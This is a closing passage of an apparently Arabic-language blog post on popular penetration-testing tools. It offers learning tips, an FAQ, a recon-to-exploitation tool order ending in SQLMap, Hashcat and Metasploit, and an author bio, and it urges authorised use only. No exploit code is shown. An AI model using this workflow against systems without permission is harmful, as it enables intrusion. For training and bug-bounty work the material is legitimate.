رابع نصيحة... وثّق كل إشي. كل ثغرة تلاقيها وكل أمر تشغله سجله. استخدم Obsidian أو Notion.

خامس نصيحة... مارس على بيئات تدريبية: HackTheBox, TryHackMe, PortSwigger Academy, DVWA, Juice Shop.

سادس نصيحة... تابع مصادر الثغرات. اشترك بقوائم بريدية زي Full Disclosure و Exploit-DB وتابع حسابات الباحثين الأمنيين على تويتر. كل يوم بتنكشف ثغرات جديدة وأول ما تتعلمها بتكون أسبق من غيرك باكتشافها على أهداف Bug Bounty.

سابع نصيحة... ابني مختبرك الخاص. ثبت VirtualBox أو VMware وحمّل أنظمة مخصصة للتدريب زي Metasploitable و DVWA و Vulnhub Machines. هاي بتخليك تجرب كل الأدوات بحرية كاملة بدون ما تخاف تضر حدا.

ثامن نصيحة... تعلم البرمجة. مش لازم تكون مبرمج محترف، بس تعلم Python و Bash Scripting رح يغير حياتك. لأنك رح تقدر تكتب أدوات مخصصة وتربط الأدوات مع بعض وتوفر على حالك وقت كتير.

وإذا بدك تتعلم أوامر الأساسيات، شوف مقالنا عن أوامر Termux الكاملة.

أسئلة شائعة

سؤال: هل بقدر أستخدم هالأدوات على هاتفي بدون كمبيوتر؟

أيوا بتقدر تستخدم أغلبها عن طريق Termux على أندرويد. أدوات زي Nmap, SQLMap, Subfinder, Nuclei, Gobuster كلها بتشتغل. بس Hashcat بتحتاج GPU قوي يعني أحسنلك تشغلها على كمبيوتر. و Burp Suite بتحتاج واجهة رسومية.

سؤال: شو أفضل نظام تشغيل لاختبار الاختراق؟

Kali Linux بدون تفكير. مبني خصيصاً لاختبار الاختراق وفيه أغلب الأدوات مثبتة مسبقاً. بس كمان Parrot OS و Black Arch ممتازين. وإذا مش قادر تثبت Linux، شغله كـ Virtual Machine عن طريق VirtualBox أو VMware.

سؤال: هل هالأدوات بتشتغل مع بعض؟

طبعاً وهاد أقوى إشي فيها. Pipeline: Subfinder ثم httpx ثم Katana ثم Nuclei. كل أداة بتاخذ نتائج اللي قبلها وبتكمل عليها. شوف السكربت اللي حطيته فوق.

سؤال: كيف أتعلم اختبار الاختراق من الصفر؟

تعلم أساسيات الشبكات (TCP/IP, DNS, HTTP) أولاً. بعدين Linux وسطر الأوامر. بعدين سجل على TryHackMe وابدأ المسارات المجانية. بعدين جرب الأدوات على بيئات تدريبية وتابع مدونة Shadow Hacker.

سؤال: هل اختبار الاختراق ممنوع؟

اختبار الاختراق بحد ذاته مش ممنوع... الممنوع هو فحص أهداف بدون إذن. إذا عندك إذن خطي أو بتشتغل على Bug Bounty أو بتتدرب على منصات تعليمية، هاد كله شرعي. المهم تلتزم بالنطاق المحدد.

سؤال: كم ممكن أربح من Bug Bounty؟

المبالغ بتتراوح حسب خطورة الثغرة والشركة. ثغرة XSS بسيطة ممكن تجيبك من 100 لـ 500 دولار. ثغرة SQL Injection أو RCE ممكن توصل لآلاف الدولارات. وشركات زي Google و Microsoft بتدفع حتى 100,000 دولار للثغرات الخطيرة. أهم إشي تبدأ وتتعلم من كل ثغرة بتلاقيها.

سؤال: شو الفرق بين Nuclei و Nmap لفحص الثغرات؟

Nmap أداة فحص شبكات عامة بتكشف بورتات وخدمات وأنظمة تشغيل. سكربتات NSE فيها بتفحص ثغرات بس بشكل محدود. أما Nuclei فمتخصصة بفحص ثغرات الويب وعندها آلاف Templates لكل أنواع الثغرات. الأفضل تستخدم الاتنين مع بعض: Nmap للشبكة و Nuclei للويب.

خلاصة المقال

هاي كانت أقوى 10 أدوات اختبار اختراق على GitHub لسنة 2026 مع أكواد استغلال وحيل حصرية. كل أداة إلها دور مهم... من جمع المعلومات وفحص الشبكات لحد استغلال الثغرات وكسر كلمات السر.

الترتيب اللي بستخدمه بأي عملية: Subfinder ثم Katana ثم Nmap ثم Nuclei ثم ffuf/Gobuster ثم Burp Suite ثم SQLMap ثم Hashcat ثم Metasploit. هاد الترتيب بيبدأ من جمع المعلومات السلبي ثم الفعّال ثم الفحص ثم الاستغلال. وكل مرحلة بتعتمد على نتائج اللي قبلها.

والنصيحة الأهم... لا توقف عن التعلم. عالم الأمن المعلوماتي بيتطور بسرعة مجنونة. اللي بيضل يتعلم ويجرب هو اللي بيتقدم. وتذكر إنو كل الأدوات اللي حكينا عنها مجانية ومفتوحة المصدر... يعني ما في حجة تمنعك من البداية اليوم.

وآخر إشي... لا تستخدم هالأدوات إلا على أهداف مصرّح إلك فيها. سواء Bug Bounty Programs أو بيئات تدريبية أو مشاريع عمل عندك إذن خطي فيها. الأمن المعلوماتي مجال راقي والمحترفين فيه بيحترموا القواعد.

ولا تنسوا تتابعوا قناة ومدونة Shadow Hacker... وإذا عندكم أي سؤال أو أداة بدكم أشرحها بالتفصيل اكتبولي بالتعليقات. دمتم بحماية وأمان يا شباب.

الكلمات المفتاحية: أدوات اختبار اختراق 2026, أقوى أدوات pentesting GitHub, Nmap شرح واستغلال, Metasploit EternalBlue, Nuclei فحص ثغرات, SQLMap حقن قواعد بيانات, Subfinder اكتشاف نطاقات, Burp Suite شرح, ffuf fuzzing, Hashcat كسر كلمات السر, Katana web crawling, Gobuster شرح, أدوات Kali Linux 2026, Bug Bounty أدوات, CVE exploit code, اختبار اختراق تطبيقات الويب


SH

Shadow Hacker

مؤسس ومحرر المدونة | خبير أمن معلومات وتقنية

متخصص في الأمن السيبراني واختبار الاختراق وتحليل الثغرات. بشارك معكم كل جديد في عالم التقنية والأمن المعلوماتي بأسلوب عملي ومبسط.

🔔 لا تفوتك مواضيعنا الجديدة!

تابعنا عشان توصلك أحدث المقالات في عالم الأمن والتقنية مباشرة

Tareq Shadow
Tareq Shadow
طارق الصافي المعروف في الأوساط التقنية بلقب "Shadow Hacker"، متخصص ومهتم بشغف في مجال التقنية وأمن المعلومات. لدي خبرة واسعة في أحدث التقنيات والتهديدات الأمنية السيبرانية. على مر السنين، أحب تقديم حلول مبتكرة لحماية البيانات والأنظمة من التهديدات الرقمية المتطورة. بجانب اهتماماتي بالتقنية، احب مشاركة المعرفة مع الجميع واحب ان اكون جزءًا من الحركة العالمية التي تسعى لجعل الإنترنت مكانًا أكثر أمانًا للجميع.
تعليقات